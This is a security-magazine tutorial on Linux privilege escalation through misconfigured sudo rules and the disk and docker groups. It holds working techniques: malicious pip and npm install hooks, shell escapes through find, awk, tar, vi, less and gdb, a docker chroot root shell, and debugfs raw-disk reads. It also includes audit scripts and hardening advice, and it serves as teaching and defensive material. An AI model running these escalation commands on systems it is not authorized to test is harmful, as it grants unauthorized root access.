Linux Privilege Escalation From Misconfiguration by Anand M

INTRODUCTION

Background: Computer systems are designed to support multiple activities and multiple users. A privilege is what a user is permitted to do on the system: read or write files, execute programs, or modify system files. Privilege escalation means a user obtains privileges they are not entitled to. Those privileges can then be used to delete files, view private information, or install unwanted programs such as viruses, Trojans and other malware. Escalation becomes possible when a system has a bug that allows a security check to be bypassed, or when it has flawed design assumptions about how it will be used, and those flaws can be leveraged to turn ordinary access into root access.

Privilege escalation is the act of exploiting a bug, design flaw, configuration oversight or misconfiguration in an operating system or software application to gain elevated access to resources that are normally protected from an application or end user. An application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

While organizations are statistically likely to have more Windows clients, Linux privilege escalation attacks are significant threats to account for when assessing an organization's information security posture. Consider that an organization's most critical infrastructure, for example web servers, databases and firewalls, is likely running a Linux operating system. Compromise of these critical devices can severely disrupt an organization's operations, if not halt them completely. Furthermore, Internet of Things (IoT) and embedded systems are becoming ubiquitous in the workplace, thereby increasing the number of potential targets for malicious actors. Given the prevalence of Linux devices in the workplace, it is of paramount importance that organizations harden and secure them.

What is Privilege escalation?

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to the system.

What is SUDO?

Sudo (su “do”) allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.

Sudoers file

The sudoers file lists each user (or group) together with the programs they may run through sudo and the user they may run them as. It is located at /etc/sudoers, with optional drop-in files under /etc/sudoers.d/. Editing it requires elevated privileges and should be done with visudo, which checks the syntax before saving.

(Figure: the sudoers file)

CHECKING SUDO commands for a user

A user can list the commands they are permitted to run through sudo with the command sudo -l. Several common programs, when permitted via sudo, let an attacker spawn a root shell or write arbitrary files as root. Below are some of the commands that, when run as sudo, are exploited for privilege escalation.
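Checking a user's sudo rights by hand is error-prone once there are many rules, so a small audit helper is useful. The script below is an added example, not code from the original article: it parses sudo -l style output and flags any rule that grants one of the shell-capable programs discussed in this article. The sample sudo -l output is constructed for the demo, and the DANGEROUS_BINS list is an assumption drawn from the sections that follow.

```shell
#!/bin/sh
# Added example (not from the original article): flag risky `sudo -l` rules.
# SAMPLE_SUDO_L is constructed demo output; DANGEROUS_BINS is an assumption
# built from the programs this article covers.

DANGEROUS_BINS="npm pip pip3 find mount man awk gawk nmap wget gdb vi vim ftp less more tar composer"

SAMPLE_SUDO_L='Matching Defaults entries for dev on web01:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User dev may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/find, /usr/bin/awk
    (root) /usr/bin/vi /etc/hosts
    (root) /usr/bin/systemctl restart nginx'

# Succeed if the basename of $1 is a program from which a shell can be spawned.
is_dangerous() {
    bin=$(basename "$1")
    for d in $DANGEROUS_BINS; do
        [ "$d" = "$bin" ] && return 0
    done
    return 1
}

# Read `sudo -l` output on stdin and print "<runas> <program>[ NOPASSWD]"
# for every risky rule. Rule lines look like:
#   "    (root) NOPASSWD: /usr/bin/find, /usr/bin/awk"   or   "    (ALL : ALL) ALL"
audit_sudo_rules() {
    while IFS= read -r line; do
        case "$line" in
            *"("*")"*) ;;        # a rule line: "(runas) [tag:] cmd, cmd"
            *) continue ;;       # header, Defaults or blank line
        esac
        runas=${line#*"("}
        runas=${runas%%")"*}
        rest=${line#*")"}
        nopass=""
        case "$rest" in *NOPASSWD:*) nopass=" NOPASSWD" ;; esac
        rest=${rest#*:}          # drop the PASSWD:/NOPASSWD: tag, if any
        printf '%s\n' "$rest" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=$(printf '%s' "$cmd" | sed 's/^[[:space:]]*//')
            cmd=${cmd%% *}       # keep the program, not its fixed arguments
            [ -z "$cmd" ] && continue
            if [ "$cmd" = "ALL" ]; then
                printf '%s ALL%s (unrestricted sudo)\n' "$runas" "$nopass"
            elif is_dangerous "$cmd"; then
                printf '%s %s%s\n' "$runas" "$cmd" "$nopass"
            fi
        done
    done
}

# Audit the invoking user's real rules (needs a cached sudo timestamp or NOPASSWD).
audit_current_user() {
    sudo -n -l 2>/dev/null | audit_sudo_rules
}

if [ "${1:-}" = "--live" ]; then
    audit_current_user
else
    printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_rules
fi
```

Run without arguments it audits the constructed sample and reports find and awk (NOPASSWD) and vi; the systemctl rule is left alone because a fixed, non-interactive command is not a shell escape. Run with --live it feeds the real sudo -l output through the same logic. Note that a rule such as /usr/bin/vi /etc/hosts is still flagged: restricting the file argument does not stop vi from running a shell.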

npm:

npm is a package manager for the JavaScript programming language. It is the default package manager for the JavaScript runtime environment Node.js. A malicious package.json is created containing a preinstall script, and the npm install command is run with "--unsafe-perm". When npm runs as root it normally drops to an unprivileged user before running lifecycle scripts; --unsafe-perm disables that, so the preinstall script runs as root.

pip:

Pip (the Python package installer) is used to install Python packages. Because several packages need to be installed with elevated privileges, pip is often granted through sudo. This can be exploited with a malicious Python package whose setup.py runs arbitrary code at install time.

(Figure: malicious setup.py)

(Figure: executing pip)

(Figure: listener for reverse shell)
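The npm and pip cases above are the same technique: a package whose install hook runs attacker-chosen code as whoever performs the install. The script below is an added example, not code from the original article or its screenshots. It builds both packages; the hook only records the installing user's uid in a file named hook-uid next to the package (an assumption standing in for the reverse shell the article's screenshots used), and the package names and paths are made up. The install_as_root function is what the attacker would run on a target where sudoers grants pip and npm; it is not executed by the script itself.

```shell
#!/bin/sh
# Added example (not from the original article): build a pip package and an
# npm package whose install hooks run a command. Hook payload, names and
# paths are assumptions for the demo.

# Python: setup.py is plain code that pip executes at install time.
build_pip_package() {
    dir=$1
    mkdir -p "$dir"
    cat > "$dir/setup.py" <<'EOF'
import os
# Runs as the invoking user: root when launched via `sudo pip install .`
here = os.path.dirname(os.path.abspath(__file__))
os.system("id -u > " + os.path.join(here, "hook-uid"))
try:
    from setuptools import setup
except ImportError:          # the hook has already fired; nothing else needed
    raise SystemExit(0)
setup(name="evilpkg", version="0.1", py_modules=[])
EOF
}

# Node: npm runs the "preinstall"/"postinstall" scripts through /bin/sh.
# Running as root, npm normally drops to "nobody" for these scripts;
# --unsafe-perm keeps them running as root.
build_npm_package() {
    dir=$1
    mkdir -p "$dir"
    cat > "$dir/package.json" <<'EOF'
{
  "name": "evilpkg",
  "version": "0.1.0",
  "scripts": { "preinstall": "id -u > hook-uid" }
}
EOF
}

# What the attacker runs on the target (assumes sudoers grants pip and npm).
# Not executed here.
install_as_root() {
    (cd "$1" && sudo pip install .)
    sudo npm install --unsafe-perm "$2"
}

# Read back the uid a hook recorded; prints nothing if it never fired.
hook_uid() {
    cat "$1/hook-uid" 2>/dev/null
}

if [ "${1:-}" = "--build" ]; then
    build_pip_package "${2:-/tmp/evilpkg-py}"
    build_npm_package "${3:-/tmp/evilpkg-js}"
fi
```

Running python3 setup.py --name inside the generated directory is enough to see the hook fire as the current user; under sudo pip install it fires as root, and a real payload would start a reverse shell instead of writing a file.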

Find:

The find command is used to search for files. When find can be run through sudo, it can be exploited with the -exec argument, which runs an arbitrary command (for example a shell) as root for each matched file.

Mount:

The mount command is used to mount filesystems. When mount can be run through sudo, it can be used to spawn a shell and escalate privileges, for example by bind-mounting a shell binary over the mount program itself and then running mount again, or by mounting a filesystem (without nosuid) that contains a SUID root shell.

man:

The man command is used for viewing manual pages. Running man through sudo can be exploited because man displays pages through a pager (usually less), and the pager's shell escape spawns a shell as root.

AWK:

AWK is a programming language designed for text processing and typically used as a data extraction and reporting tool. awk run through sudo can be exploited through its built-in system() function, which hands any command string to /bin/sh, so a one-line awk program is enough to start a root shell.

NMAP:

Nmap is a program used for scanning ports and services. When nmap can be run through sudo, it can be exploited by writing a short Lua script that executes a shell, saving it with a .nse extension and running it with the --script option; the script then runs as root.

WGET:

Wget is a command used to download files. Wget running through sudo can be exploited in two ways.

First, with the -O argument wget can overwrite any file on the system, such as /etc/passwd or /etc/sudoers, with attacker-controlled content served from a host the attacker controls. Second, with the --post-file argument it can send a file readable only by root to an attacker's server.

GDB:

GDB (the GNU Debugger) is a tool used to debug applications. gdb run through sudo can be exploited because it can execute shell commands from its own prompt (the shell command, or an exclamation mark followed by the command), which can also be passed on the command line with -ex.


Vi:

Vi is a text editor. vi run through sudo can be used to spawn a shell and elevate privileges.

When vi is opened, type :!/bin/bash (the exclamation mark runs the command from inside the editor; :set shell=/bin/bash followed by :shell works too).

FTP:

The ftp command is an FTP client used to connect to FTP servers. ftp with sudo permission can be exploited by running a command from its prompt with the exclamation-mark escape, which spawns a shell as root.

Less:

The less command is used to view the contents of a file.

Running it with sudo privileges can be exploited: at the less prompt, the exclamation-mark escape followed by a shell name spawns that shell as root.

More:

The more command is similar to less and is also used to view the contents of a file. more running with sudo privileges can be used to spawn an elevated shell through the same escape, provided the file being viewed is longer than one screen so that the prompt appears.

Tar:

If tar can be run through sudo, its --checkpoint-action=exec option executes an arbitrary command while archiving, and that command runs in the privileged context. This can be used to read any file, escalate, or maintain access with elevated privileges. The payload executes and the attacker receives a reverse shell with root privileges.
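The find, awk and tar cases above are non-interactive, so the mechanism can be shown from a script. The following is an added example, not code from the original article. Each helper runs a command through one of those programs; the command used here is id -u, so the output shows which user the child ran as. It assumes a host whose sudoers contains a rule such as "(root) NOPASSWD: /usr/bin/find" (and likewise for awk and tar): with PRIV left empty the child is the caller, with PRIV=sudo the uid printed is 0, and replacing id -u with /bin/sh gives a root shell. Use it only on systems you are authorized to test.

```shell
#!/bin/sh
# Added example (not from the original article). Runs a command through the
# programs discussed in the text; PRIV=sudo is the assumed misconfiguration.
PRIV=${PRIV:-}

# find: -exec runs the given command once per matched path (/dev/null matches once).
via_find() {
    $PRIV find /dev/null -exec "$@" \;
}

# awk: the built-in system() passes its argument to /bin/sh -c.
via_awk() {
    $PRIV awk -v cmd="$*" 'BEGIN { system(cmd) }'
}

# tar: --checkpoint-action=exec=CMD runs CMD through /bin/sh at each checkpoint.
# Archiving /dev/null to /dev/null does nothing useful except reach a checkpoint.
via_tar() {
    $PRIV tar -cf /dev/null /dev/null --checkpoint=1 \
        --checkpoint-action=exec="$*" 2>/dev/null | head -n 1
}

# The interactive programs from the article cannot be scripted the same way.
# The keystrokes, typed at each program's own prompt after e.g. `sudo less /etc/hosts`:
#   less / more / man : !sh
#   vi / vim          : :!/bin/bash      (or :set shell=/bin/bash then :shell)
#   ftp               : !/bin/sh
#   gdb               : shell            (or non-interactively: gdb -nx -ex '!sh' -ex quit)

if [ "${1:-}" = "--demo" ]; then
    for tool in find awk tar; do
        printf '%-4s -> child uid %s\n' "$tool" "$("via_$tool" id -u)"
    done
fi
```

Running the script with --demo as an ordinary user prints that user's uid three times; the same three lines print 0 when PRIV=sudo and the sudoers rules above are present, which is exactly the check a pentester makes before replacing id -u with a shell.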

Composer:

If a user can run composer through sudo, a malicious composer.json gives an attacker root: the scripts section of composer.json runs shell commands during install, update or run-script, and with sudo those commands execute with root privileges.

Privilege Escalation via Groups:

A Linux user belongs to one or more groups, and some groups grant access that is equivalent to root. To view all groups and their members, type "getent group" in a terminal; "id" shows the current user's own groups.

Disk group:

If a user is in the disk group, the user has raw read and write access to the block devices, and therefore to every byte of every filesystem on them, bypassing file permissions entirely.

The user can open the block device that holds the root filesystem with a tool like debugfs (for ext2/3/4 filesystems) and read or write any file on it, such as /etc/shadow or the SSH keys in /root/.ssh.

(Figure: root filesystem opened with debugfs)

(Figure: reading a file in the /root directory)

Docker Group:

If a user has access to the Docker daemon socket or is in the docker group, that access is equivalent to root: the daemon runs as root, so the user can start a container with the host's root filesystem bind-mounted into it and read or modify any file on the host.
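Checking group membership is the first step, and the two abuse paths above follow from it. The script below is an added example, not code from the original article. The getent group output it parses is constructed for the demo, and RISKY_GROUPS is an assumption (the two groups discussed here plus the groups that commonly carry sudo rights). The debugfs and docker helpers show the commands described above and are not executed by the script itself.

```shell
#!/bin/sh
# Added example (not from the original article): find root-equivalent group
# memberships, then the disk-group and docker-group abuse paths.
# SAMPLE_GETENT is constructed; RISKY_GROUPS is an assumption.

RISKY_GROUPS="disk docker sudo wheel"

SAMPLE_GETENT='root:x:0:
disk:x:6:bob
sudo:x:27:alice
docker:x:998:bob,carol
developers:x:1001:alice,bob,carol'

# Read `getent group` output on stdin; print "group(gid)" for each risky
# group that lists user $1 as a member.
risky_groups_for() {
    user=$1
    while IFS=: read -r name pw gid members; do
        for g in $RISKY_GROUPS; do
            [ "$g" = "$name" ] || continue
            case ",$members," in
                *",$user,"*) printf '%s(%s)\n' "$name" "$gid" ;;
            esac
        done
    done
}

# disk group: debugfs (ext2/3/4) reads the block device directly, so the
# permissions on the mounted filesystem never apply. With -w it can also
# write, e.g. the debugfs command "write /tmp/keys /root/.ssh/authorized_keys".
read_via_debugfs() {        # usage: read_via_debugfs /dev/sda1 /root/.ssh/id_rsa
    debugfs -R "cat $2" "$1"
}

# docker group: the daemon runs as root, so a container that bind-mounts the
# host root can chroot into it and act as root on the host.
root_shell_via_docker() {
    docker run --rm -it -v /:/mnt alpine chroot /mnt /bin/sh
}

if [ "${1:-}" = "--live" ]; then
    getent group | risky_groups_for "$(id -un)"
fi
```

With the sample data, bob is reported in disk(6) and docker(998) and alice in sudo(27); --live runs the same check against the real system for the current user. The device path passed to read_via_debugfs is whatever "findmnt /" or "df /" reports for the root filesystem.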

Conclusion:

Privilege escalation can be achieved through misconfigured sudo access and group membership. This article examined several Linux privilege escalation techniques that are in active use as of the date of publication. While the Linux community has made great progress in securing its systems, these techniques show that exploitable weaknesses are still present in how the operating system and user-level applications are configured. Many of the techniques discussed will remain viable for the foreseeable future, as they abuse basic functionality of the Linux operating system rather than bugs that can be patched away. This reinforces the importance of identifying, validating and remediating Linux privilege escalation vulnerabilities. Linux systems such as production servers, embedded devices and cloud infrastructure are often critical to an organization's operation; if these devices are compromised, the security of the whole organization is in question. The author therefore urges Linux administrators to take ownership of the security of these devices and harden them appropriately. Essentially, if administrators remain current on patches, carefully audit privileged programs and users, and follow secure computing practices, they can significantly reduce their exposure to privilege escalation attacks and ultimately improve their Linux security posture.

Preventions:

  • Wildcards can introduce critical vulnerabilities when used carelessly in scripts and cron jobs that run as root (tar, for example, treats a file whose name begins with --checkpoint-action= as an option rather than a filename). Fortunately, these vulnerabilities are easy to remediate. First, administrators should be aware of the risks of deploying automated scripts and services that run as root. Where possible, they should follow the principle of least privilege, relying on targeted sudo rules and group permissions rather than blanket use of the root account. Next, when writing cron jobs, administrators should refrain from using wildcards and instead name the files they operate on explicitly; omitting the wildcard keeps all of the functionality with none of the risk.
  • Properly mitigating sudo abuse requires careful management of sudo users and their permissions. Administrators must ensure that sudo users use strong passwords, as attackers will very likely attempt password cracking against accounts that hold sudo rights. Additionally, administrators should review sudo rules for programs that can execute arbitrary commands, such as the editors, pagers and tools listed above. Granting sudo on an editor is not safe whether it is vi or nano, since both can spawn a shell; if a user must edit a root-owned file, use sudoedit, which edits a temporary copy as the user and copies it back into place. If a user needs read access to sensitive files, consider adding them to a specific group that has permission to read the file instead of giving them blanket sudo rights. Finally, administrators must treat sudo users with the same level of care and caution expected of the root account.
  • Administrators should inventory the SUID binaries on each system and examine them to determine whether they legitimately require elevated permissions, and also to check whether the application has parameters that can be abused. Be vigilant for SUID binaries that accept parameters for code execution, for example '-e' or '--exec', or parameters that write arbitrary data to the file system; these parameters can usually be found in the application's manual page. Next, identify and correct world-writable SUID programs, as these let attackers insert malicious code into the privileged program's execution. Lastly, examine partitioning schemes as they relate to SUID binaries: for example, mount user-writable partitions with 'nosuid', which prevents users from introducing insecure SUID binaries onto the file system. It is also notable that after attackers successfully escalate privileges, they frequently create additional backdoors for later use by marking command shells, text editors and interactive programs as SUID and placing them in obscure areas of the file system. Regularly auditing and validating SUID binaries will mitigate SUID privilege escalation attacks and can also help in identifying and responding to unauthorized intrusions.
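The SUID audit in the last bullet is mechanical enough to script. The following is an added example, not code from the original article: it inventories SUID binaries under a given root, flags those that are world-writable or whose name matches a program that can execute commands, and lists user-writable mount points that lack nosuid. The SHELL_CAPABLE list is an assumption built from the programs covered in this article and should be extended for the tools present on a given system.

```shell
#!/bin/sh
# Added example (not from the original article): SUID and mount-option audit.
# SHELL_CAPABLE is an assumption (programs from this article); extend as needed.

SHELL_CAPABLE="find awk gawk vi vim less more man nmap gdb tar wget"

# All SUID regular files below $1 (default /), without crossing filesystems.
list_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null
}

# SUID files that are also writable by everyone: anyone can replace the
# code that runs with the owner's privileges.
list_world_writable_suid() {
    find "${1:-/}" -xdev -type f -perm -4002 2>/dev/null
}

# SUID files whose name is a program that can spawn a shell or write files.
flag_shell_capable_suid() {
    list_suid "$1" | while IFS= read -r f; do
        b=$(basename "$f")
        for k in $SHELL_CAPABLE; do
            if [ "$k" = "$b" ]; then
                printf 'DANGEROUS SUID: %s\n' "$f"
            fi
        done
    done
}

# Mount points where unprivileged users can write but SUID bits are still
# honoured. Reads /proc/mounts format: "device mountpoint fstype options dump pass".
mounts_without_nosuid() {
    while read -r dev mnt fstype opts rest; do
        case ",$opts," in *,nosuid,*) continue ;; esac
        case "$mnt" in
            /home|/home/*|/tmp|/var/tmp|/dev/shm) printf '%s (%s)\n' "$mnt" "$opts" ;;
        esac
    done < "${1:-/proc/mounts}"
}

if [ "${1:-}" = "--live" ]; then
    echo "== SUID inventory ==";                  list_suid /
    echo "== world-writable SUID ==";             list_world_writable_suid /
    echo "== shell-capable SUID ==";              flag_shell_capable_suid /
    echo "== writable mounts without nosuid =="; mounts_without_nosuid
fi
```

Run with --live as root for a complete picture (as an ordinary user, directories that are not readable are silently skipped). Anything reported under the second and third headings should be treated as a finding, and a SUID shell, editor or pager in an unusual directory is a strong sign of a backdoor left by a previous intrusion.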


About the Author:

Name: ANAND M

Email: anand@infysec.com

Company: https://www.infysec.com/

The post Linux Privilege Escalation From Misconfiguration by Anand M appeared first on Hakin9 - IT Security Magazine.
